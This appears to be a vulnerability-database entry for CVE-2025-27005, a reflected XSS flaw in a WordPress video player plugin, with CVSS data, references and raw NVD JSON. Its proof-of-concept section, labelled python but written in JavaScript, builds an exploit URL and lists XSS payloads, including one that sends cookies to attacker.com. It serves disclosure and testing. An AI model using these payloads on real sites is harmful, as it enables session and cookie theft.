CVE-2025-27005

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player lbg-vp2-html5-bottom allows Reflected XSS.This issue affects HTML5 Video Player: from n/a through <= 5.3.5.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

lbg-vp2-html5-bottom (HTML5 Video Player) <= 5.3.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-27005 Reflected XSS PoC
// Target: LambertGroup HTML5 Video Player WordPress Plugin <= 5.3.5

// Malicious URL construction
const targetUrl = 'https://vulnerable-site.com/wp-admin/admin.php';
const maliciousParam = '<script>alert(document.cookie)</script>';
const exploitUrl = `${targetUrl}?page=lbg_vp2_html5_videos_video&video_path=${encodeURIComponent(maliciousParam)}`;

console.log('Exploit URL:', exploitUrl);

// Alternative XSS payloads
const payloads = [
    "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>",
    "<img src=x onerror=alert(document.domain)>",
    "<svg/onload=alert(localStorage.getItem('auth'))>",
    "javascript:prompt(document.cookie)"
];

// Display payloads for testing
payloads.forEach((payload, index) => {
    console.log(`Payload ${index + 1}:`, encodeURIComponent(payload));
});

/* 
Attack Execution:
1. Attacker crafts malicious URL with XSS payload
2. Victim clicks the link or is redirected to it
3. Server reflects the unsanitized input in the response
4. Victim's browser executes the malicious script
5. Attacker steals cookies/session data
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27005
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27005
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27005/
[4] VulDB https://vuldb.com/cve/CVE-2025-27005
[5] https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-bottom/vulnerability/wordpress-html5-video-player-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27005", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:53.997", "lastModified": "2026-04-27T17:16:25.867", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player lbg-vp2-html5-bottom allows Reflected XSS.This issue affects HTML5 Video Player: from n/a through <= 5.3.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup HTML5 Video Player lbg-vp2-html5-bottom permite XSS Reflejado. Este problema afecta a HTML5 Video Player: desde n/a hasta <= 5.3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-bottom/vulnerability/wordpress-html5-video-player-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}